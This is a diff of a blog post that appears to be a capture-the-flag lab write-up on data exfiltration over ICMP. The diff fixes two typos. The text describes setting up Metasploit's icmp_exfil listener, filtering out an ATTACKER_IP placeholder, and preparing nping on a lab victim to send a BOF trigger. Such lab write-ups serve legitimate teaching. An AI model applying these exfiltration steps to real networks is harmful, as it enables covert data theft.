CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

 msf6 auxiliary(server/icmp_exfil) > run
 ```

-The `BPF_FILTER` options is used so it captures only ICMP packets, `set BPF_FILTER icmp`, and ignore any ICMP packets that have the source IP of the attacking machine, `and not src ATTACKER_IP`.
+The `BPF_FILTER` option is used so it captures only ICMP packets, `set BPF_FILTER icmp`, and ignore any ICMP packets that have the source IP of the attacking machine, `and not src ATTACKER_IP`.

 We also need to select which network interface to listen to.
 We can see our network interfaces via the `ifconfig` command:

 ![ifconfig](ifconfig.png)

 This room has prepared the `icmp.thm.com` machine as the victim for this task, so we can log into it via SSH (first connect to Jumpbox, and from Jumpbox connect to `icmp.thm.com`).
-This machinehas the [NPING](https://nmap.org/nping/) tool installed, which is part of the **NMAP** suite.
+This machine has the [NPING](https://nmap.org/nping/) tool installed, which is part of the **NMAP** suite.

 Once logged into the `icmp.thm.com`, we need to send the **BOF trigger** so that Metasploit starts writing to the disk.
 The **BOF trigger** defaults to "*^BOF*", followed by the filename being sent: